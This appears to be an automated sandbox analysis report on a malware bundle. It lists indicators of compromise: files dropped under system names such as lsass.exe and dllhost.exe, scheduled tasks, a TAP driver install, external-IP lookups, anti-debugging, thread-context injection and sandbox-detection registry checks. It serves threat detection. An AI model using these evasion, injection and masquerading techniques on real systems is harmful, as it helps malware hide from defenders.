Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VQF2oO7acvvovPhrwKWLMcyD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GcpFYsjX4UKHyKnErFNxlep5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZZ6GYPrzOB779rzI1ngINoXX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Dy1p0_A7yf7E__PB5TFDm6I9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mh9JAL13r0v0BmNX5FgEGHKj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FBFC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner Installation.exemsiexec.exeEsplorarne.exe.commsiexec.exeSetup.exedescription ioc process File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: Esplorarne.exe.com File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: Esplorarne.exe.com File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: Esplorarne.exe.com File opened (read-only) \??\M: Esplorarne.exe.com File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\O: Esplorarne.exe.com File opened (read-only) \??\U: Esplorarne.exe.com File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\T: Esplorarne.exe.com File opened (read-only) \??\Y: Esplorarne.exe.com File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: Setup.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\X: Esplorarne.exe.com File opened (read-only) \??\Z: Esplorarne.exe.com File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\W: Esplorarne.exe.com File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: Esplorarne.exe.com File opened (read-only) \??\V: Esplorarne.exe.com File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: Esplorarne.exe.com File opened (read-only) \??\R: Esplorarne.exe.com File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\L: Esplorarne.exe.com File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 213 ipinfo.io 215 ipinfo.io 232 ipinfo.io 362 ipinfo.io 28 ipinfo.io 29 ipinfo.io 139 ip-api.com 174 ipinfo.io 367 ipinfo.io 172 ipinfo.io 222 ipinfo.io 242 ipinfo.io 393 ip-api.com -
Drops file in System32 directory 32 IoCs
Processes:
Esplorarne.exe.comsvchost.exeWerFault.exesvchost.exeDrvInst.exetapinstall.exedescription ioc process File created C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET8759.tmp Esplorarne.exe.com File created C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET876A.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\Tasks\3bddbg9jWr7Ig8wwsIl8rRbl svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent FEC73EF8B0D04BBA svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\tap0901.cat Esplorarne.exe.com File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET8769.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e} Esplorarne.exe.com File created C:\Windows\System32\negoexts\5940a34987c99120d96dace90a3f93f329dcad63 WerFault.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 6B50F5DF294FAA8F svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf Esplorarne.exe.com File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\4b5m9Xjbeh4Y9rTVY8V4famT svchost.exe File created C:\Windows\System32\DscTimer\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 WerFault.exe File created C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET8769.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 003E50D9DA6B575F svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhost svchost.exe File created C:\Windows\System32\DscTimer\lsass.exe WerFault.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET876A.tmp Esplorarne.exe.com File created C:\Windows\System32\DriverStore\drvstore.tmp Esplorarne.exe.com File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\Tasks\iHIn3Sm9ab4PCPMlOJLksIeI svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\oemvista.inf Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys Esplorarne.exe.com File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\SET8759.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{63087f52-b33a-1d45-8ff7-a906b3388a2e}\tap0901.sys Esplorarne.exe.com File opened for modification C:\Windows\System32\Tasks\lsass svchost.exe File created C:\Windows\System32\negoexts\dllhost.exe WerFault.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
Mh9JAL13r0v0BmNX5FgEGHKj.exeGcpFYsjX4UKHyKnErFNxlep5.exeVQF2oO7acvvovPhrwKWLMcyD.exeCW9iZUPnTLWFDj2aH5MN_4dK.exebuilder.exeZZ6GYPrzOB779rzI1ngINoXX.exeDy1p0_A7yf7E__PB5TFDm6I9.exezY9vzMCWwAKcME9k5UgICs9t.exe5whapuEleHrHkM3YY_zHWiK8.exemask_svc.exeFBFC.exemask_svc.exemask_svc.exepid process 2172 Mh9JAL13r0v0BmNX5FgEGHKj.exe 2660 GcpFYsjX4UKHyKnErFNxlep5.exe 2696 VQF2oO7acvvovPhrwKWLMcyD.exe 2772 CW9iZUPnTLWFDj2aH5MN_4dK.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 7104 ZZ6GYPrzOB779rzI1ngINoXX.exe 5928 builder.exe 6436 Dy1p0_A7yf7E__PB5TFDm6I9.exe 6924 zY9vzMCWwAKcME9k5UgICs9t.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 4004 5whapuEleHrHkM3YY_zHWiK8.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 7804 mask_svc.exe 5928 builder.exe 1888 FBFC.exe 5928 builder.exe 4432 mask_svc.exe 5928 builder.exe 2792 mask_svc.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe 5928 builder.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
sr1e6evbYvPSPR1h8l_TGwVu.exej_16kKcB4jVgGPLP0gdjWZI_.exelscm9tUiznW_ZuLtt7SqvXzl.exesvchost.exexSrL1QRuFcmsVaGKJ6KvkP1I.exeZpv9oGuLq0irt1z3Dy09GNLE.exeschtasks.exeRuntimeBroker.exeEsplorarne.exe.comY3dp0DoOXQwgkUcZkMM1oR1J.exeRUNDLL32.EXEEsplorarne.exe.comdescription pid process target process PID 3220 set thread context of 4532 3220 sr1e6evbYvPSPR1h8l_TGwVu.exe sr1e6evbYvPSPR1h8l_TGwVu.exe PID 1912 set thread context of 4812 1912 j_16kKcB4jVgGPLP0gdjWZI_.exe j_16kKcB4jVgGPLP0gdjWZI_.exe PID 1412 set thread context of 1044 1412 lscm9tUiznW_ZuLtt7SqvXzl.exe lscm9tUiznW_ZuLtt7SqvXzl.exe PID 2536 set thread context of 4948 2536 svchost.exe svchost.exe PID 3736 set thread context of 4428 3736 xSrL1QRuFcmsVaGKJ6KvkP1I.exe xSrL1QRuFcmsVaGKJ6KvkP1I.exe PID 6696 set thread context of 5652 6696 Zpv9oGuLq0irt1z3Dy09GNLE.exe Zpv9oGuLq0irt1z3Dy09GNLE.exe PID 6008 set thread context of 6504 6008 schtasks.exe 1TsU7XyCbc6_GIz5E0qEjgjc.exe PID 4680 set thread context of 7808 4680 RuntimeBroker.exe RuntimeBroker.exe PID 6956 set thread context of 6792 6956 Esplorarne.exe.com 0cec99sYPHC4JtcYL6Dyhoy2.exe PID 6512 set thread context of 2732 6512 Y3dp0DoOXQwgkUcZkMM1oR1J.exe Y3dp0DoOXQwgkUcZkMM1oR1J.exe PID 8712 set thread context of 9172 8712 RUNDLL32.EXE rundll32.exe PID 7576 set thread context of 9024 7576 Esplorarne.exe.com 3187.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Setup.exeEsplorarne.exe.comSetup.tmpWerFault.exeEsplorarne.exe.commd8_8eus.exeultramediaburner.tmprRzYjitRkR6jBplorkkpKLg9.exezGFs3qgZ52GcHMqEBczEQ9x9.exerundll32.exeMaskVPNUpdate.exeultradumnibour.exedescription ioc process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File created C:\Program Files (x86)\Sofware IN LLC\is-FARTL.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-KCKLP.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-7K48T.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-0VH5D.tmp Setup.tmp File created C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe\AppxMetadata\taskhostw.exe WerFault.exe File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-II15C.tmp Setup.tmp File created C:\Program Files\Windows Sidebar\Gadgets\fontdrvhost.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-C83IR.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2FGVE.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe Setup.exe File created C:\Program Files (x86)\Sofware IN LLC\is-DHO0J.tmp Esplorarne.exe.com File created C:\Program Files (x86)\UltraMediaBurner\is-936O7.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-PE2PM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe rRzYjitRkR6jBplorkkpKLg9.exe File opened for modification C:\Program Files (x86)\Sofware IN LLC\libcueify.dll Esplorarne.exe.com File created C:\Program Files (x86)\Sofware IN LLC\is-CI377.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-O6PC5.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-G1GF2.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-H60U3.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe zGFs3qgZ52GcHMqEBczEQ9x9.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2EIKA.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-DSAO0.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JU5KG.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe rRzYjitRkR6jBplorkkpKLg9.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\PROGRA~3\Gskyj.tmp rundll32.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\Sofware IN LLC\unins000.dat Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-PKDNE.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-6DC4G.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-KIP09.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-HFTOE.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-E8EIU.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File created C:\Program Files (x86)\Sofware IN LLC\is-RIG0D.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-GDQ4E.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-0VR4P.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-Q57VG.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\MaskVPN\is-6IKR8.tmp Setup.tmp File created C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe.config ultradumnibour.exe File created C:\Program Files\Windows Security\7d3d368b80e270c0d20b0e16f8ca721b1752ba91 WerFault.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Setup.tmp File created C:\Program Files (x86)\Google\Gafyjagufo.exe ultradumnibour.exe File opened for modification C:\Program Files (x86)\Sofware IN LLC\unins000.dat Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp -
Drops file in Windows directory 36 IoCs
Processes:
MicrosoftEdge.exemsiexec.exeEsplorarne.exe.comEsplorarne.exe.comxRxZGAoA5TFUm46yqDqWyLKe.exesvchost.exesvchost.exeDrvInst.exeWerFault.exetapinstall.exeEsplorarne.exe.comMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI8F13.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf Esplorarne.exe.com File opened for modification C:\Windows\Debug\ESE.TXT Esplorarne.exe.com File opened for modification C:\Windows\GameBarPresenceWriter\4b5m9Xjbeh4Y9rTVY8V4famT.exe xRxZGAoA5TFUm46yqDqWyLKe.exe File opened for modification C:\Windows\Installer\MSIF09C.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Logs\DPX\setupact.log svchost.exe File opened for modification C:\Windows\Installer\MSI8A01.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\InfusedApps\Frameworks\customer3.exe WerFault.exe File opened for modification C:\Windows\Installer\MSIA1F2.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log Esplorarne.exe.com File created C:\Windows\GameBarPresenceWriter\aca10721b035278564e788014379df1f2aaf2a91 xRxZGAoA5TFUm46yqDqWyLKe.exe File created C:\Windows\Installer\f78928e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI823F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9F61.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT Esplorarne.exe.com File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\GameBarPresenceWriter\4b5m9Xjbeh4Y9rTVY8V4famT.exe xRxZGAoA5TFUm46yqDqWyLKe.exe File opened for modification C:\Windows\Installer\f78928e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7E18.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC0E7.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI83D6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9CFF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAB89.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\inf\oem2.inf Esplorarne.exe.com -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4540 1392 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe 840 1392 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe 1732 2804 WerFault.exe 4b5m9Xjbeh4Y9rTVY8V4famT.exe 4132 1392 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe 5180 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 5388 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 2072 1392 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe 5516 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 5844 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 6052 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 6040 1392 WerFault.exe ySzhlkxv6lvVdaZGAMZc3MjG.exe 4820 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 4460 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 5200 2240 WerFault.exe 9NeY7wDiJGhrvsW_GspXT3lp.exe 6492 7096 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe 7292 7096 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe 7668 7096 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe 6008 7096 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe 7452 7016 WerFault.exe uQ1sY0V9BPG6y1BJhAoaX8hC.exe 2100 7096 WerFault.exe Vlaiw1QOxP2xyB7onsxPGq4k.exe 5320 2932 WerFault.exe gWbvKgUeUq65ebon4O0hHSuX.exe 8292 2932 WerFault.exe gWbvKgUeUq65ebon4O0hHSuX.exe 4212 2932 WerFault.exe gWbvKgUeUq65ebon4O0hHSuX.exe 1856 6764 WerFault.exe MicrosoftEdgeCP.exe 6404 8252 WerFault.exe MicrosoftEdgeCP.exe 8056 5072 WerFault.exe MicrosoftEdgeCP.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Esplorarne.exe.com0cec99sYPHC4JtcYL6Dyhoy2.exetapinstall.exesvchost.exeGZCE7lNx2wr8c3GHhY6VpQGL.exetapinstall.exeEsplorarne.exe.comDrvInst.exelV0cLJRjBoCNp3_nrE9Ro2WP.exeEsplorarne.exe.comdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Esplorarne.exe.com Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0cec99sYPHC4JtcYL6Dyhoy2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A Esplorarne.exe.com Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI GZCE7lNx2wr8c3GHhY6VpQGL.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A 